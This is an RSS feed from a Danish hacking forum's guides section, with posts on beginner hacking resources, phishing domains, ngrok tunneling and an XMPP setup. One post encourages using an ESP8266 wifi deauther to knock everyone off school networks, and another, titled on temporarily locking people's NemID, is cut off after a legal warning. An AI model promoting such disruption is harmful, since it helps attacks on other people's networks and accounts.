<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Shellsec - Vejledninger]]></title>
		<link>https://www.shellsec.pw/</link>
		<description><![CDATA[Shellsec - https://www.shellsec.pw]]></description>
		<pubDate>Mon, 18 May 2026 06:06:31 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Gratis Instagram Followers]]></title>
			<link>https://www.shellsec.pw/traad-gratis-instagram-followers</link>
			<pubDate>Wed, 22 Aug 2018 19:57:37 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-gratis-instagram-followers</guid>
			<description><![CDATA[jeg faldt over denne side som levere Instagram services. hvor de har en gratis trial på 20 followers (Hver 24 time)<br />
dog giver de altid mere, så tænkte nogle af jer måske kunne bruge det til noget. hvis i har problemer så kan i bare kontakte mig <br />
<br />
Skriv hvis i kunne bruge det til noget :)<br />
<br />
Link til siden: <div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;">https://plusmein.com/index.php?page=freefollowers</div></div>]]></description>
			<content:encoded><![CDATA[jeg faldt over denne side som levere Instagram services. hvor de har en gratis trial på 20 followers (Hver 24 time)<br />
dog giver de altid mere, så tænkte nogle af jer måske kunne bruge det til noget. hvis i har problemer så kan i bare kontakte mig <br />
<br />
Skriv hvis i kunne bruge det til noget :)<br />
<br />
Link til siden: <div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;">https://plusmein.com/index.php?page=freefollowers</div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Kompendium - Et sted at starte.] The Path]]></title>
			<link>https://www.shellsec.pw/traad-kompendium-et-sted-at-starte-the-path</link>
			<pubDate>Mon, 28 May 2018 13:11:02 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-kompendium-et-sted-at-starte-the-path</guid>
			<description><![CDATA[<span style="font-family: Courier New;" class="mycode_font"><span style="font-size: xx-large;" class="mycode_size"><span style="color: #ff3333;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">OBS: denne tråd er under udvikling.</span></span></span><br />
<br />
<br />
Hej, jeg går under navnet EngLen, lad mig først starte med at sige: lad nu bare vær med at doxe mig, jeg er nem at finde.<br />
Dette er som så ikke en guide men mere, et sted nye som gamle kan starte og er et Kompendium over ting man kan og, efter min mening, bør give sig i kast med hvis man vil være en hacker.<br />
Men det er bare min mening.<br />
<br />
Dan din egen!<br />
<br />
<span style="color: #cc3333;" class="mycode_color">OBS:</span> <span style="color: #cc3333;" class="mycode_color">Denne tråd kræver du rent faktisk GIDER at LÆSE.</span><br />
<br />
</span><br />
<div style="text-align: left;" class="mycode_align"><blockquote class="mycode_quote"><cite>Fra Wikipedia, den frie encyklopædi Skrev:</cite>Kompendium eller kompendie (lat. af com og pendo, 'vejet sammen') er en forkortning, kort sammenfatning eller et uddrag.<br />
Kan bruges som betegnelse for en kortfattet lærebog (ledetråd) og for en sammentrængt fremstilling af en videnskabs hovedindhold.<br />
Udtrykket bruges også inden for fotografering om en særlig form for modlysblænde, en indstillelig bælg, især ved teknisk fotografering</blockquote></div>
<br />
<div style="text-align: left;" class="mycode_align"><span style="color: #ff3333;" class="mycode_color"><span style="font-family: Courier New;" class="mycode_font">        DU KAN LÆRE BASIS PROGRAMMERING FRA &gt; <a href="https://www.tutorialspoint.com/index.htm" target="_blank" rel="noopener" class="mycode_url">tutorialspoint.com</a></span></span></div>
<ul class="mycode_list"><li><span style="font-family: Courier New;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">PROGRAMMING</span></span><ul class="mycode_list"><li><span style="font-family: Courier New;" class="mycode_font">C#</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">C++</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Python</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Ruby</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Java</span><br />
<br />
<span style="color: #ff3333;" class="mycode_color"><span style="font-family: Courier New;" class="mycode_font">DU KAN LÆRE BASIS WEBDEVLOPMENT FRA tutorialspoint &gt;  <a href="https://www.tutorialspoint.com/index.htm" target="_blank" rel="noopener" class="mycode_url">tutorialspoint.com</a></span></span><br />
</li>
</ul>
</li>
<li><span style="font-family: Courier New;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">WEB DEVELOPMENT</span></span><ul class="mycode_list"><li><span style="font-family: Courier New;" class="mycode_font">HTML</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">CSS</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">SCCS(Også kendt som sass)</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">PHP</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Javascript</span><br />
</li>
</ul>
</li>
</ul>
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: large;" class="mycode_size"><span style="font-family: Courier New;" class="mycode_font"><span style="text-decoration: underline;" class="mycode_u">LINUX</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><div style="text-align: left;" class="mycode_align"><span style="font-size: large;" class="mycode_size"><span style="font-family: Courier New;" class="mycode_font"><span style="font-size: small;" class="mycode_size">Mange vælger at bruge linux(f.eks. Kali linux)Kali Linux er basalt set et Linux Distro der har hundred af hacking tools til rådighed. Men hvad nytter det hvis du ikke ved hvordan du bruger dem? Så i stedet for at gøre som mange gør og installere Kali(eller anden Linux Distro</span><span style="font-size: small;" class="mycode_size">) på din PC eller hvad du nu kunne finde på, Vil jeg råde dig til at installere det dejlige lille program der hedder <a href="https://www.virtualbox.org/" target="_blank" rel="noopener" class="mycode_url">VirtualBox</a>, da du kan installere det du skal bruge der i. Være det sig LINUX eller WINDOWS.</span></span></span><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-family: Courier New;" class="mycode_font"><span style="font-size: small;" class="mycode_size">Du kan enda lave dit helt eget hacking lab og øve dig der. Hvilket jeg klart vil forslå du Googler(google er din ven) dig til hvordan du gør, der er utallige guides på dette så lige det vil jeg ikke gå ind i lige nu.<br />
<br />
Den vigtigste del af at være en hacker, er Research. En vær idiot kan hacke, Men få kan VIRKELIG hacke, det tager år og atter år og for andre gør det ikke. Men jeg her brugt år på at lære hvad jeg ved i dag, og det er ikke ret meget faktisk.<br />
<br />
<br />
</span></span></span></div>
</div>]]></description>
			<content:encoded><![CDATA[<span style="font-family: Courier New;" class="mycode_font"><span style="font-size: xx-large;" class="mycode_size"><span style="color: #ff3333;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">OBS: denne tråd er under udvikling.</span></span></span><br />
<br />
<br />
Hej, jeg går under navnet EngLen, lad mig først starte med at sige: lad nu bare vær med at doxe mig, jeg er nem at finde.<br />
Dette er som så ikke en guide men mere, et sted nye som gamle kan starte og er et Kompendium over ting man kan og, efter min mening, bør give sig i kast med hvis man vil være en hacker.<br />
Men det er bare min mening.<br />
<br />
Dan din egen!<br />
<br />
<span style="color: #cc3333;" class="mycode_color">OBS:</span> <span style="color: #cc3333;" class="mycode_color">Denne tråd kræver du rent faktisk GIDER at LÆSE.</span><br />
<br />
</span><br />
<div style="text-align: left;" class="mycode_align"><blockquote class="mycode_quote"><cite>Fra Wikipedia, den frie encyklopædi Skrev:</cite>Kompendium eller kompendie (lat. af com og pendo, 'vejet sammen') er en forkortning, kort sammenfatning eller et uddrag.<br />
Kan bruges som betegnelse for en kortfattet lærebog (ledetråd) og for en sammentrængt fremstilling af en videnskabs hovedindhold.<br />
Udtrykket bruges også inden for fotografering om en særlig form for modlysblænde, en indstillelig bælg, især ved teknisk fotografering</blockquote></div>
<br />
<div style="text-align: left;" class="mycode_align"><span style="color: #ff3333;" class="mycode_color"><span style="font-family: Courier New;" class="mycode_font">        DU KAN LÆRE BASIS PROGRAMMERING FRA &gt; <a href="https://www.tutorialspoint.com/index.htm" target="_blank" rel="noopener" class="mycode_url">tutorialspoint.com</a></span></span></div>
<ul class="mycode_list"><li><span style="font-family: Courier New;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">PROGRAMMING</span></span><ul class="mycode_list"><li><span style="font-family: Courier New;" class="mycode_font">C#</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">C++</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Python</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Ruby</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Java</span><br />
<br />
<span style="color: #ff3333;" class="mycode_color"><span style="font-family: Courier New;" class="mycode_font">DU KAN LÆRE BASIS WEBDEVLOPMENT FRA tutorialspoint &gt;  <a href="https://www.tutorialspoint.com/index.htm" target="_blank" rel="noopener" class="mycode_url">tutorialspoint.com</a></span></span><br />
</li>
</ul>
</li>
<li><span style="font-family: Courier New;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">WEB DEVELOPMENT</span></span><ul class="mycode_list"><li><span style="font-family: Courier New;" class="mycode_font">HTML</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">CSS</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">SCCS(Også kendt som sass)</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">PHP</span><br />
</li>
<li><span style="font-family: Courier New;" class="mycode_font">Javascript</span><br />
</li>
</ul>
</li>
</ul>
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: large;" class="mycode_size"><span style="font-family: Courier New;" class="mycode_font"><span style="text-decoration: underline;" class="mycode_u">LINUX</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><div style="text-align: left;" class="mycode_align"><span style="font-size: large;" class="mycode_size"><span style="font-family: Courier New;" class="mycode_font"><span style="font-size: small;" class="mycode_size">Mange vælger at bruge linux(f.eks. Kali linux)Kali Linux er basalt set et Linux Distro der har hundred af hacking tools til rådighed. Men hvad nytter det hvis du ikke ved hvordan du bruger dem? Så i stedet for at gøre som mange gør og installere Kali(eller anden Linux Distro</span><span style="font-size: small;" class="mycode_size">) på din PC eller hvad du nu kunne finde på, Vil jeg råde dig til at installere det dejlige lille program der hedder <a href="https://www.virtualbox.org/" target="_blank" rel="noopener" class="mycode_url">VirtualBox</a>, da du kan installere det du skal bruge der i. Være det sig LINUX eller WINDOWS.</span></span></span><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-family: Courier New;" class="mycode_font"><span style="font-size: small;" class="mycode_size">Du kan enda lave dit helt eget hacking lab og øve dig der. Hvilket jeg klart vil forslå du Googler(google er din ven) dig til hvordan du gør, der er utallige guides på dette så lige det vil jeg ikke gå ind i lige nu.<br />
<br />
Den vigtigste del af at være en hacker, er Research. En vær idiot kan hacke, Men få kan VIRKELIG hacke, det tager år og atter år og for andre gør det ikke. Men jeg her brugt år på at lære hvad jeg ved i dag, og det er ikke ret meget faktisk.<br />
<br />
<br />
</span></span></span></div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[phising attack]  Samme domain name]]></title>
			<link>https://www.shellsec.pw/traad-phising-attack-samme-domain-name</link>
			<pubDate>Sat, 17 Feb 2018 01:00:11 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-phising-attack-samme-domain-name</guid>
			<description><![CDATA[Det er rimeligt let at finde ud af om man er offer for et phising attack. Selve html'en kan nemt kopies til mindste detalje, men domain navnet er anderledes. <br />
Skal du fx logge ind på paypal, så kan du nemt se om det nu også er deres hjemmeside du er på, og ikke blot en phising side. Tja.... Ikke mere.<br />
<br />
Hvis du er interesseret kan du læse videre her: <a href="https://dev.to/loganmeetsworld/homographs-attack--5a1p" target="_blank" rel="noopener" class="mycode_url">https://dev.to/loganmeetsworld/homographs-attack--5a1p</a>]]></description>
			<content:encoded><![CDATA[Det er rimeligt let at finde ud af om man er offer for et phising attack. Selve html'en kan nemt kopies til mindste detalje, men domain navnet er anderledes. <br />
Skal du fx logge ind på paypal, så kan du nemt se om det nu også er deres hjemmeside du er på, og ikke blot en phising side. Tja.... Ikke mere.<br />
<br />
Hvis du er interesseret kan du læse videre her: <a href="https://dev.to/loganmeetsworld/homographs-attack--5a1p" target="_blank" rel="noopener" class="mycode_url">https://dev.to/loganmeetsworld/homographs-attack--5a1p</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Guide] Åbn op for din lokale server, så resten af internettet kan tilgå den]]></title>
			<link>https://www.shellsec.pw/traad-guide-aabn-op-for-din-lokale-server</link>
			<pubDate>Thu, 08 Jun 2017 12:15:11 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-guide-aabn-op-for-din-lokale-server</guid>
			<description><![CDATA[Jeg fandt et smukt værktøj for et års tid siden der hedder <a href="https://ngrok.com/" target="_blank" rel="noopener" class="mycode_url">ngrok</a>. ngrok bruger jeg selv til at tilgå min Amazon Echo jeg har herhjemme, da Amazon kræver en sikker SSL forbindelse mellem min server og deres, og da jeg ikke havde tid eller overskud til at oprette nogle certifikater og finde en måde at bruge det på med Flask i Python.<br />
<br />
Dette vil dog mest blive brugt til folk der <span style="font-style: italic;" class="mycode_i">ikke</span> kan port forwarde.<br />
<br />
Så vidt jeg kan finde frem til, kan du åbne op for alt. TCP og HTTP er nok de mest normale, men her er nogle eksempler:<ul class="mycode_list"><li>Lave din egen webserver<br />
</li>
<li>Tillad adgang til en SSH server<br />
</li>
<li>Åbne op for en FTP server<br />
</li>
<li>Køre et botnet (til udvikling, ellers skal du passe på)<br />
</li>
</ul>
<br />
og mange, mange flere. Det virker på den måde, at du kører en command hvor du specificerer protokollen (for eksempel TCP eller HTTP) samt hvilken port.<br />
<br />
Når du så kører commanden, sker der nogle ting:<br />
<ol type="1" class="mycode_list"><li>ngrok åbner "tunnel" til deres server<br />
</li>
<li>Deres server opretter en URL<br />
</li>
<li>ngrok outputter URLen til dig<br />
</li>
</ol>
<br />
Hvis du kører en webserver på port 80 (som du kan tilgå på fx http://localhost/), så kan du meget nemt oprette en tunnel således:<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>ngrok http -region eu 80</code></div></div><br />
Jeg har tilføjet <span style="font-weight: bold;" class="mycode_b">-region eu</span> så den bruger en af deres europæriske servere. Nu får du en URL tilbage, der kunne ligne noget i stil med: <a href="http://b172270d.eu.ngrok.io" target="_blank" rel="noopener" class="mycode_url">http://b172270d.eu.ngrok.io</a><br />
<br />
Går du ind på den URL, vil den vise dig din lokale side! Du kan sende den URL til så mange du har lyst til, og de vil stadigvæk kunne se den. Derudover kan du gøre det "ekstra sikkert", ved at uddele HTTPS URLen (bare skriv https i stedet for http).<br />
<br />
Hvis du ejer et domæne, kan du også få den peget over, så den peger på ngrok. Dette kan du læse om her: <a href="https://ngrok.com/docs#custom-domains" target="_blank" rel="noopener" class="mycode_url">https://ngrok.com/docs#custom-domains</a><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Vigtig detalje</span></span><br />
Hver gang du lukker for ngrok tunnelen og åbner den igen (samme command), vil din URL være anderledes. Dette kan løses ved at oprette en bruger og betale &#36;5 om måneden. Er du studerende, kan du få 40% rabat ved at sende en mail til dem, så det er faktisk rigtig billigt for så fedt et værktøj. Når du har betalt, kan du få dit eget custom subdomæne, så du fx kan oprette <a href="http://ash.ngrok.io/" target="_blank" rel="noopener" class="mycode_url">http://ash.ngrok.io/</a> og bruge den samme hver gang.<br />
<br />
Håber dette kan hjælpe nogen, hvis de har problemer med at port forwarde eller lignende!]]></description>
			<content:encoded><![CDATA[Jeg fandt et smukt værktøj for et års tid siden der hedder <a href="https://ngrok.com/" target="_blank" rel="noopener" class="mycode_url">ngrok</a>. ngrok bruger jeg selv til at tilgå min Amazon Echo jeg har herhjemme, da Amazon kræver en sikker SSL forbindelse mellem min server og deres, og da jeg ikke havde tid eller overskud til at oprette nogle certifikater og finde en måde at bruge det på med Flask i Python.<br />
<br />
Dette vil dog mest blive brugt til folk der <span style="font-style: italic;" class="mycode_i">ikke</span> kan port forwarde.<br />
<br />
Så vidt jeg kan finde frem til, kan du åbne op for alt. TCP og HTTP er nok de mest normale, men her er nogle eksempler:<ul class="mycode_list"><li>Lave din egen webserver<br />
</li>
<li>Tillad adgang til en SSH server<br />
</li>
<li>Åbne op for en FTP server<br />
</li>
<li>Køre et botnet (til udvikling, ellers skal du passe på)<br />
</li>
</ul>
<br />
og mange, mange flere. Det virker på den måde, at du kører en command hvor du specificerer protokollen (for eksempel TCP eller HTTP) samt hvilken port.<br />
<br />
Når du så kører commanden, sker der nogle ting:<br />
<ol type="1" class="mycode_list"><li>ngrok åbner "tunnel" til deres server<br />
</li>
<li>Deres server opretter en URL<br />
</li>
<li>ngrok outputter URLen til dig<br />
</li>
</ol>
<br />
Hvis du kører en webserver på port 80 (som du kan tilgå på fx http://localhost/), så kan du meget nemt oprette en tunnel således:<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>ngrok http -region eu 80</code></div></div><br />
Jeg har tilføjet <span style="font-weight: bold;" class="mycode_b">-region eu</span> så den bruger en af deres europæriske servere. Nu får du en URL tilbage, der kunne ligne noget i stil med: <a href="http://b172270d.eu.ngrok.io" target="_blank" rel="noopener" class="mycode_url">http://b172270d.eu.ngrok.io</a><br />
<br />
Går du ind på den URL, vil den vise dig din lokale side! Du kan sende den URL til så mange du har lyst til, og de vil stadigvæk kunne se den. Derudover kan du gøre det "ekstra sikkert", ved at uddele HTTPS URLen (bare skriv https i stedet for http).<br />
<br />
Hvis du ejer et domæne, kan du også få den peget over, så den peger på ngrok. Dette kan du læse om her: <a href="https://ngrok.com/docs#custom-domains" target="_blank" rel="noopener" class="mycode_url">https://ngrok.com/docs#custom-domains</a><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Vigtig detalje</span></span><br />
Hver gang du lukker for ngrok tunnelen og åbner den igen (samme command), vil din URL være anderledes. Dette kan løses ved at oprette en bruger og betale &#36;5 om måneden. Er du studerende, kan du få 40% rabat ved at sende en mail til dem, så det er faktisk rigtig billigt for så fedt et værktøj. Når du har betalt, kan du få dit eget custom subdomæne, så du fx kan oprette <a href="http://ash.ngrok.io/" target="_blank" rel="noopener" class="mycode_url">http://ash.ngrok.io/</a> og bruge den samme hver gang.<br />
<br />
Håber dette kan hjælpe nogen, hvis de har problemer med at port forwarde eller lignende!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Luk hvilket som helst wifi (almost) + andre features]]></title>
			<link>https://www.shellsec.pw/traad-luk-hvilket-som-helst-wifi-almost-andre</link>
			<pubDate>Sat, 03 Jun 2017 14:38:54 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-luk-hvilket-som-helst-wifi-almost-andre</guid>
			<description><![CDATA[<span style="font-size: small;" class="mycode_size">Hey Shellsec, Stødte på en mega fed lille device den anden dag og købte en</span><br />
<br />
<span style="font-size: small;" class="mycode_size">tænkte mange herinde ville synes det var interessant, det er en såkaldt "Wifi Jammer" som gør at du kan tage et netværk som du er i nærheden af og sørge for at alle der er logget på netværket bliver smidt af og ingen kan logge på det indtil du stopper dit "attack"</span><br />
<br />
<br />
<br />
<span style="font-size: small;" class="mycode_size">Det er relativt simpelt at bruge, kræver dog basis viden og lidt tid at sætte op første gang.</span><br />
<br />
<span style="font-size: small;" class="mycode_size">Den device du skal bruge hedder "ESP8266" og kan købes online for ca 30 kr +/-</span><br />
<br />
<span style="font-size: small;" class="mycode_size">istedet for at forklare hvordan man bruger den linker jeg bare et par videoer da det forklarer det godt, men hvis i har nogen problemer så skriv her i tråden:</span><br />
<span style="font-size: small;" class="mycode_size"><a href="https://www.youtube.com/watch?v=N5JVQ-m5Kd0" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=N5JVQ-m5Kd0</a> - træls accent, men viser det fint </span><br />
<span style="font-size: small;" class="mycode_size"><a href="https://www.youtube.com/watch?v=r5aoV5AolNo" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=r5aoV5AolNo</a> - Bedre video, brugte hans metode til at opdatere devicen osv</span><br />
<br />
<span style="font-size: small;" class="mycode_size">når man åbner ESP8266 lige ud af pakken fungerer den ikke ordentligt, men bare følg tutorials på youtube hvordan man opdaterer den og så virker den.</span><br />
<br />
<span style="font-size: small;" class="mycode_size">De 2 features jeg bruger er "Death To all" som lukker alle ude af nettet og gør nettet ubrugeligt indtil du slår programmet fra</span><br />
<span style="font-size: small;" class="mycode_size">og "Beacon" Som laver en helvedes masse netværk med enten random navne eller navne du bestemmer (se imgur billede jeg har vedhæftet)</span><br />
<br />
Det er et sjovt tool til at lukke netværk på f.eks. skoler/gymnasier osv osv - det skal dog siges at det er pisse ulovligt at gøre med andres netværk, så pas på<br />
<br />
<span style="font-size: small;" class="mycode_size"><a href="http://imgur.com/a/Feko0" target="_blank" rel="noopener" class="mycode_url">http://imgur.com/a/Feko0</a> - </span><br />
<span style="font-size: small;" class="mycode_size"><img src="http://imgur.com/a/Feko0" width="600" height="600" alt="[Billede: Feko0]" class="mycode_img" /></span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: small;" class="mycode_size">Hey Shellsec, Stødte på en mega fed lille device den anden dag og købte en</span><br />
<br />
<span style="font-size: small;" class="mycode_size">tænkte mange herinde ville synes det var interessant, det er en såkaldt "Wifi Jammer" som gør at du kan tage et netværk som du er i nærheden af og sørge for at alle der er logget på netværket bliver smidt af og ingen kan logge på det indtil du stopper dit "attack"</span><br />
<br />
<br />
<br />
<span style="font-size: small;" class="mycode_size">Det er relativt simpelt at bruge, kræver dog basis viden og lidt tid at sætte op første gang.</span><br />
<br />
<span style="font-size: small;" class="mycode_size">Den device du skal bruge hedder "ESP8266" og kan købes online for ca 30 kr +/-</span><br />
<br />
<span style="font-size: small;" class="mycode_size">istedet for at forklare hvordan man bruger den linker jeg bare et par videoer da det forklarer det godt, men hvis i har nogen problemer så skriv her i tråden:</span><br />
<span style="font-size: small;" class="mycode_size"><a href="https://www.youtube.com/watch?v=N5JVQ-m5Kd0" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=N5JVQ-m5Kd0</a> - træls accent, men viser det fint </span><br />
<span style="font-size: small;" class="mycode_size"><a href="https://www.youtube.com/watch?v=r5aoV5AolNo" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=r5aoV5AolNo</a> - Bedre video, brugte hans metode til at opdatere devicen osv</span><br />
<br />
<span style="font-size: small;" class="mycode_size">når man åbner ESP8266 lige ud af pakken fungerer den ikke ordentligt, men bare følg tutorials på youtube hvordan man opdaterer den og så virker den.</span><br />
<br />
<span style="font-size: small;" class="mycode_size">De 2 features jeg bruger er "Death To all" som lukker alle ude af nettet og gør nettet ubrugeligt indtil du slår programmet fra</span><br />
<span style="font-size: small;" class="mycode_size">og "Beacon" Som laver en helvedes masse netværk med enten random navne eller navne du bestemmer (se imgur billede jeg har vedhæftet)</span><br />
<br />
Det er et sjovt tool til at lukke netværk på f.eks. skoler/gymnasier osv osv - det skal dog siges at det er pisse ulovligt at gøre med andres netværk, så pas på<br />
<br />
<span style="font-size: small;" class="mycode_size"><a href="http://imgur.com/a/Feko0" target="_blank" rel="noopener" class="mycode_url">http://imgur.com/a/Feko0</a> - </span><br />
<span style="font-size: small;" class="mycode_size"><img src="http://imgur.com/a/Feko0" width="600" height="600" alt="[Billede: Feko0]" class="mycode_img" /></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[XMPP tutorial] Tilslut dig XMPP.]]></title>
			<link>https://www.shellsec.pw/traad-xmpp-tutorial-tilslut-dig-xmpp</link>
			<pubDate>Sat, 27 May 2017 18:14:07 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-xmpp-tutorial-tilslut-dig-xmpp</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Der er forskellige alternativer for klienter så som pidgin, psi og mange flere...</div>
<div style="text-align: center;" class="mycode_align">Min fortrukkene er "Tor Messenger" som også tilbyder dig en række andre protocoler at kunne tilslutte, irc osv.</div>
<div style="text-align: center;" class="mycode_align">Men Tor Messenger router også automatisk din traffic over klienten gennem tor og tilbyder dig automatisk OTR (Off-the-record) for besked-kryptering.</div>
<div style="text-align: center;" class="mycode_align">Det vil sige at det er et default plugin som kommer med klienten og ikke behøves at installeres fra deres hjemmeside.</div>
<br />
<div style="text-align: center;" class="mycode_align">Kan downloades her: <a href="https://dist.torproject.org/tormessenger/0.4.0b2/tormessenger-install-0.4.0b2_en-US.exe" target="_blank" rel="noopener" class="mycode_url">https://dist.torproject.org/tormessenger..._en-US.exe</a> (officielt download link)</div>
<div style="text-align: center;" class="mycode_align">Når det er installeret og åbent, så tryk på "tools" og vælg "accounts", tryk så på "New account" nede i bunden af programmet.</div>
<div style="text-align: center;" class="mycode_align">Vælg så protocol "XMPP" og tryk "Next", tryk så på "Create this new account on server" og i brugernavn skriv dit brugernavn og i domain skriv, jabber.cz og tryk "Next"</div>
<div style="text-align: center;" class="mycode_align">Så skriver du dit password og trykker "Next", så kommer deres captcha op og registration form, skriv præcis samme brugernavn og password og tryk "Next"</div>
<br />
<div style="text-align: center;" class="mycode_align">Du har nu oprettet dit XMPP account.</div>
<div style="text-align: center;" class="mycode_align">Du kan så give din xmpp så de kan ansøge dig, det er bare: ditbrugernavn@jabber.cz</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Der er forskellige alternativer for klienter så som pidgin, psi og mange flere...</div>
<div style="text-align: center;" class="mycode_align">Min fortrukkene er "Tor Messenger" som også tilbyder dig en række andre protocoler at kunne tilslutte, irc osv.</div>
<div style="text-align: center;" class="mycode_align">Men Tor Messenger router også automatisk din traffic over klienten gennem tor og tilbyder dig automatisk OTR (Off-the-record) for besked-kryptering.</div>
<div style="text-align: center;" class="mycode_align">Det vil sige at det er et default plugin som kommer med klienten og ikke behøves at installeres fra deres hjemmeside.</div>
<br />
<div style="text-align: center;" class="mycode_align">Kan downloades her: <a href="https://dist.torproject.org/tormessenger/0.4.0b2/tormessenger-install-0.4.0b2_en-US.exe" target="_blank" rel="noopener" class="mycode_url">https://dist.torproject.org/tormessenger..._en-US.exe</a> (officielt download link)</div>
<div style="text-align: center;" class="mycode_align">Når det er installeret og åbent, så tryk på "tools" og vælg "accounts", tryk så på "New account" nede i bunden af programmet.</div>
<div style="text-align: center;" class="mycode_align">Vælg så protocol "XMPP" og tryk "Next", tryk så på "Create this new account on server" og i brugernavn skriv dit brugernavn og i domain skriv, jabber.cz og tryk "Next"</div>
<div style="text-align: center;" class="mycode_align">Så skriver du dit password og trykker "Next", så kommer deres captcha op og registration form, skriv præcis samme brugernavn og password og tryk "Next"</div>
<br />
<div style="text-align: center;" class="mycode_align">Du har nu oprettet dit XMPP account.</div>
<div style="text-align: center;" class="mycode_align">Du kan så give din xmpp så de kan ansøge dig, det er bare: ditbrugernavn@jabber.cz</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Få adgang til folks facebook bruger!]]></title>
			<link>https://www.shellsec.pw/traad-faa-adgang-til-folks-facebook-bruger</link>
			<pubDate>Wed, 02 Nov 2016 19:57:54 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-faa-adgang-til-folks-facebook-bruger</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Slettet, da jeg tænker det vil blive udnyttet for meget? </span><span style="font-weight: bold;" class="mycode_b">Hmm, dunno..</span><br />
<br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: line-through;" class="mycode_s">- Peace</span></span>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Slettet, da jeg tænker det vil blive udnyttet for meget? </span><span style="font-weight: bold;" class="mycode_b">Hmm, dunno..</span><br />
<br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: line-through;" class="mycode_s">- Peace</span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Sådan lukker du folks NemID midlertidigt]]></title>
			<link>https://www.shellsec.pw/traad-saadan-lukker-du-folks-nemid-midlertidigt</link>
			<pubDate>Tue, 01 Nov 2016 09:56:02 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-saadan-lukker-du-folks-nemid-midlertidigt</guid>
			<description><![CDATA[<span style="font-size: small;" class="mycode_size"><span style="font-family: Verdana, Arial, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4500;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Verdana, Arial, sans-serif;" class="mycode_font">NOTE: Det er efter dansk lovgivning strengt forbudt at slå andres CPR numre op og benytte sig af dem.</span></span></span></span></span></span><br />
<br />
